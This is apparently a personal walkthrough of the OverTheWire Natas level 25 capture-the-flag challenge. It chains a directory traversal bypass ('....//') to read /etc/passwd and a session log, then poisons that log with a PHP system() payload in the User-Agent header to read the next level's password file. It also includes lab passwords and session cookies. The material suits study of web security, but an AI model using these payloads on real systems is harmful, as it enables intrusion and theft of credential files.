PASSWORD: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws

*TOGGLE LANGUANGE TO DE OR EN
http://natas25.natas.labs.overthewire.org/?lang=en  <-----PARAMETER

*BURP SUITE*
*TOGGLE HTTP History
*SEND ?lang=en TO Repeater
The Parameter Name = lang and Value = en
The Cookie is random

*PRES SEND TO SEE THE RESPONSE
Nothing is Different

*SEND TO Intruder
*TOGGLE INTRUDER
*CLEAR$
GET /?lang=en HTTP/1.1  <-----HIGHLIGHT en THEN *ADD$ TO FUZZ

*WEB BROWSER GITHUB SEARCH: SECLISTS*
URL: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/special-chars.txt
*FOR SPECIAL CHARACTERS*
*COPY RAW FILE

*TOGGLE PAYLOADS
*PAYLOAD SET 1
*PAYLOAD TYPE SIMPLE LIST
*PAYLOAD SETTINGS
*PRESS CLEAR
*PRESS PASTE - RAW FILE - FOR SPECIAL CHARACTERS*
*START ATTACK*

*PRESS LENGTH FOR THE SHORTEST OUTPOST
. AND / ARE THE SHORTEST OUTPOST - THEY ARE GIVING ERRORS
*RESPONSE SHOWS WARNINGS AND NOTICES*
Warning: include(/var/www/natas/natas25/language): failed to open stream: No such file or directory in /var/www/natas/natas25/index.php on line 38

Warning: include(): Failed opening 'language/.' for inclusion (include_path='.:/usr/share/php') in /var/www/natas/natas25/index.php on line 38

Notice: Undefined variable: __GREETING in /var/www/natas/natas25/index.php on line 80

Notice: Undefined variable: __MSG in /var/www/natas/natas25/index.php on line 81


Notice: Undefined variable: __FOOTER in /var/www/natas/natas25/index.php on line 82

*WEB BROWSER*
URL: http://natas25.natas.labs.overthewire.org/?lang=%00  <----NULL CHARACTER
Warning: file_exists() expects parameter 1 to be a valid path, string given in /var/www/natas/natas25/index.php on line 37

*VIEW SOURCECODE*
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src="http://natas.labs.overthewire.org/js/wechall-data.js"></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas25", "pass": "<censored>" };</script></head>
<body>
<?php
    // cheers and <3 to malvina
    // - morla

    function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en"); 
    }
    
    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);  <-----USE ....// OR ..././
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) { 
            include($filename);
            return 1;
        }
        return 0;
    }
    
    function listFiles($path){
        $listoffiles=array();
        if ($handle = opendir($path))
            while (false !== ($file = readdir($handle)))
                if ($file != "." && $file != "..")
                    $listoffiles[]=$file;
        
        closedir($handle);
        return $listoffiles;
    } 
    
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");  <-----/var/www/natas/natas25/logs/natas25_iqpblstb08fbfigcraogj5i045.log
        fwrite($fd,$log);
        fclose($fd);
    }
?>

<h1>natas25</h1>
<div id="content">
<div align="right">
<form>
<select name='lang' onchange='this.form.submit()'>
<option>language</option>
<?php foreach(listFiles("language/") as $f) echo "<option>$f</option>"; ?>
</select>
</form>
</div>

<?php  
    session_start();
    setLanguage();
    
    echo "<h2>$__GREETING</h2>";  <-----NOTICE
    echo "<p align=\"justify\">$__MSG";  <-----NOTICE
    echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";   <-----NOTICE
?>
<p>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

*WEB BROWSER*
URL: http://natas25.natas.labs.overthewire.org/?lang=....//....//....//....//....//etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false messagebus:x:101:101::/nonexistent:/usr/sbin/nologin syslog:x:102:102::/nonexistent:/usr/sbin/nologin systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin tss:x:104:104:TPM software stack,,,:/var/lib/tpm:/bin/false sshd:x:105:65534::/run/sshd:/usr/sbin/nologin pollinate:x:106:1::/var/cache/pollinate:/bin/false tcpdump:x:107:108::/nonexistent:/usr/sbin/nologin landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin fwupd-refresh:x:990:990:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin polkitd:x:989:989:User for polkitd:/:/usr/sbin/nologin ec2-instance-connect:x:109:65534::/nonexistent:/usr/sbin/nologin _chrony:x:110:112:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false natas0:x:30000:30000:natas level 0:/home/natas0:/bin/bash natas1:x:30001:30001:natas level 1:/home/natas1:/bin/bash natas10:x:30010:30010:natas level 10:/home/natas10:/bin/bash natas11:x:30011:30011:natas level 11:/home/natas11:/bin/bash natas12:x:30012:30012:natas level 12:/home/natas12:/bin/bash natas13:x:30013:30013:natas level 13:/home/natas13:/bin/bash natas14:x:30014:30014:natas level 14:/home/natas14:/bin/bash natas15:x:30015:30015:natas level 15:/home/natas15:/bin/bash natas16:x:30016:30016:natas level 16:/home/natas16:/bin/bash natas17:x:30017:30017:natas level 17:/home/natas17:/bin/bash natas18:x:30018:30018:natas level 18:/home/natas18:/bin/bash natas19:x:30019:30019:natas level 19:/home/natas19:/bin/bash natas2:x:30002:30002:natas level 2:/home/natas2:/bin/bash natas20:x:30020:30020:natas level 20:/home/natas20:/bin/bash natas21:x:30021:30021:natas level 21:/home/natas21:/bin/bash natas22:x:30022:30022:natas level 22:/home/natas22:/bin/bash natas23:x:30023:30023:natas level 23:/home/natas23:/bin/bash natas24:x:30024:30024:natas level 24:/home/natas24:/bin/bash natas25:x:30025:30025:natas level 25:/home/natas25:/bin/bash natas26:x:30026:30026:natas level 26:/home/natas26:/bin/bash natas27:x:30027:30027:natas level 27:/home/natas27:/bin/bash natas28:x:30028:30028:natas level 28:/home/natas28:/bin/bash natas29:x:30029:30029:natas level 29:/home/natas29:/bin/bash natas3:x:30003:30003:natas level 3:/home/natas3:/bin/bash natas30:x:30030:30030:natas level 30:/home/natas30:/bin/bash natas31:x:30031:30031:natas level 31:/home/natas31:/bin/bash natas32:x:30032:30032:natas level 32:/home/natas32:/bin/bash natas33:x:30033:30033:natas level 33:/home/natas33:/bin/bash natas34:x:30034:30034:natas level 34:/home/natas34:/bin/bash natas4:x:30004:30004:natas level 4:/home/natas4:/bin/bash natas5:x:30005:30005:natas level 5:/home/natas5:/bin/bash natas6:x:30006:30006:natas level 6:/home/natas6:/bin/bash natas7:x:30007:30007:natas level 7:/home/natas7:/bin/bash natas8:x:30008:30008:natas level 8:/home/natas8:/bin/bash natas9:x:30009:30009:natas level 9:/home/natas9:/bin/bash
Notice: Undefined variable: __GREETING in /var/www/natas/natas25/index.php on line 80

Notice: Undefined variable: __MSG in /var/www/natas/natas25/index.php on line 81


Notice: Undefined variable: __FOOTER in /var/www/natas/natas25/index.php on line 82

*PRINTED OUT THE FILE CONTENT AND PASSWORD FILES*


URL: http://natas25.natas.labs.overthewire.org/?lang=....//....//....//....//....//var/www/natas/natas25/logs/natas25_iqpblstb08fbfigcraogj5i045.log
[12.06.2024 08::09:02] Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 "Directory traversal attempt! fixing request." [12.06.2024 08::24:34] Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 "Directory traversal attempt! fixing request."
Notice: Undefined variable: __GREETING in /var/www/natas/natas25/index.php on line 80  <-----LOG FILES SHOWS PHP

Notice: Undefined variable: __MSG in /var/www/natas/natas25/index.php on line 81  <-----LOG FILES SHOWS PHP


Notice: Undefined variable: __FOOTER in /var/www/natas/natas25/index.php on line 82  <-----LOG FILES SHOWS PHP

*ACCESS LOG FILES*

*BURP SUITE*
*TOGGLE REPEATER*
GET /?lang=../ HTTP/1.1  <-----EDIT PARAMETER VALUE ../
Host: natas25.natas.labs.overthewire.org
User-Agent: <?php system('cat /etc/natas_webpass/natas26'); ?>  <-----ADD PHP SCRIPT TO USER AGENT*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic bmF0YXMyNTpja0VMS1VXWlVmcE92NnV4UzZNN2xYQnBCc3NKWjRXcw==
Connection: close
Referer: http://natas25.natas.labs.overthewire.org/?lang=de
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097; PHPSESSID=fh1uahfaqhva62co3k4s6coueu
Upgrade-Insecure-Requests: 1

*SEND*

*WEB BROWSER*
URL: http://natas25.natas.labs.overthewire.org/?lang=....//....//....//....//....//var/www/natas/natas25/logs/natas25_fh1uahfaqhva62co3k4s6coueu.log  <-----HIGHLIGHT AND PRESS ENTER TO REFRESH*

 [12.06.2024 10::04:16] Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 "Directory traversal attempt! fixing request." [12.06.2024 10::05:33] cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE "Directory traversal attempt! fixing request." [12.06.2024 10::05:57] Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 "Directory traversal attempt! fixing request."
Notice: Undefined variable: __GREETING in /var/www/natas/natas25/index.php on line 80

Notice: Undefined variable: __MSG in /var/www/natas/natas25/index.php on line 81


Notice: Undefined variable: __FOOTER in /var/www/natas/natas25/index.php on line 82

cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE  <-----PASSWORD
